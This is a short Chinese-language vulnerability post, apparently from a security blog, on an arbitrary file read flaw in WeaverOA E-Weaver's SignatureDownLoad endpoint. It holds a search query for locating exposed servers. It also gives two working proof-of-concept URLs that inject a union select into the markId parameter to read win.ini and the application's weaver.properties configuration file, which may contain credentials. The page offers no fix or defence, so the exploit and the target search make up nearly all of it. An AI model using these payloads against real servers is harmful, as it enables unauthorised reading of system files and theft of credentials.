WeaverOA E-Weaver SignatureDownLoad 任意文件读取漏洞
# WeaverOA E-Weaver SignatureDownLoad 任意文件读取漏洞
## 漏洞描述
WeaverOA E-Weaver SignatureDownLoad接口存在任意文件读取漏洞,攻击者通过漏洞可以读取服务器任意文件
## 漏...
WeaverOA E-Weaver SignatureDownLoad 任意文件读取漏洞
漏洞描述
WeaverOA E-Weaver SignatureDownLoad接口存在任意文件读取漏洞,攻击者通过漏洞可以读取服务器任意文件
漏洞影响
WeaverOA E-Weaver
网络测绘
app="Weaver-E-Weaver"
漏洞复现
验证POC
/weaver/weaver.file.SignatureDownLoad?markId=0%20union%20select%20%27C:/Windows/win.ini%27
/weaver/weaver.file.SignatureDownLoad?markId=0%20union%20select%20%27../ecology/WEB-INF/prop/weaver.properties%27
- 发表于 2024-07-12 18:44:47
- 阅读 ( 2337 )
- 分类:OA产品
带头大哥
456 篇文章